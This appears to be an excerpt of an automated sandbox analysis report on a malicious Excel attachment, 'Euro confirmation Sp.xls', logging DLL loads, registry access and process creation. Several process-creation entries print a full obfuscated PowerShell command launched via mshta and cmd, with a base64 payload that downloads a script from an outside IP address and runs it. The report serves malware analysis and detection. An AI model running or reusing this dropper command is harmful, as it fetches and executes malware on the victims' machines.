Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Euro confirmation Sp.xls

Static file information: File size 1062912 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.pdb source: powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.pdbhP source: powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.pdbhP source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.pdb source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: .pdb]sf+ source: powershell.exe, 00000007.00000002.465465325.000000001C40A000.00000004.00000020.00020000.00000000.sdmp

Source: Euro confirmation Sp.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"

Suspicious command line found

Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"